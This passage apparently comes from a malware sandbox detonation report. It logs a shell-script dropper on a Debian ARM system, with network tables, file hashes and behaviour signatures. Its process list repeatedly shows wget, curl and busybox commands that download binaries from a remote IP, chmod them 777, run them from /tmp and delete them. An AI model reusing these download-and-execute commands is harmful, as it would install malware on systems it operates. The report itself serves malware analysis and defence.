[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/wget
[wget http://87.120.84.230/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/chmod
[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0
[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/rm
[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/wget
[wget http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/chmod
[chmod 777 OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K
[./OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/bin/rm
[rm OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K]
/usr/bin/wget
[wget http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/chmod
[chmod 777 qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f
[./qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/bin/rm
[rm qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f]
/usr/bin/wget
[wget http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/chmod
[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU
[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/bin/rm
[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]
/usr/bin/wget
[wget http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/chmod
[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo
[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/bin/rm
[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]
/usr/bin/wget
[wget http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/chmod
[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF
[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/bin/rm
[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]
/usr/bin/wget
[wget http://87.120.84.230/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/chmod
[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0
[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/bin/rm
[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]
/usr/bin/wget
[wget http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/chmod
[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD
[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/bin/rm
[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]
/usr/bin/wget
[wget http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/chmod
[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/rm
[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/wget
[wget http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/chmod
[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/rm
[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/wget
[wget http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/chmod
[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/rm
[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/wget
[wget http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/chmod
[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/rm
[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/wget
[wget http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/chmod
[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/rm
[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/wget
[wget http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/chmod
[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/rm
[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/wget
[wget http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/chmod
[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/rm
[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| GB | 89.187.167.5:443 | tcp | |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
| MD5 | 546071c6a6aeff34580b4d1a9b35a7c3 |
| SHA1 | dc2de298837a86d3bc86e8a328411229d9eccdb6 |
| SHA256 | 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12 |
| SHA512 | 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7 |
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-29 01:46
Reported
2024-10-29 01:48
Platform
debian9-armhf-20240611-en
Max time kernel
16s
Max time network
17s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | N/A |
| N/A | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | N/A |
| N/A | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | N/A |
| N/A | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | N/A |
| N/A | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | N/A |
| N/A | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | N/A |
| N/A | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | N/A |
| N/A | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | N/A |
| N/A | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | N/A |
| N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | N/A |
| N/A | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt | /usr/bin/curl | N/A |
Processes
/tmp/a5d00471e4903988f4d09563ee3cad4dba92df4fbd6cae9d1b2ffb9ac8538747.sh
[/tmp/a5d00471e4903988f4d09563ee3cad4dba92df4fbd6cae9d1b2ffb9ac8538747.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/chmod
[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/bin/rm
[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]
/usr/bin/wget
[wget http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/chmod
[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/bin/rm
[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]
/usr/bin/wget
[wget http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/chmod
[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF
[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/bin/rm
[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]
/usr/bin/wget
[wget http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/chmod
[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs
[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/bin/rm
[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]
/usr/bin/wget
[wget http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/chmod
[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa
[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/bin/rm
[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]
/usr/bin/wget
[wget http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/chmod
[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB
[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/bin/rm
[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]
/usr/bin/wget
[wget http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/chmod
[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S
[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
/bin/rm
[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]
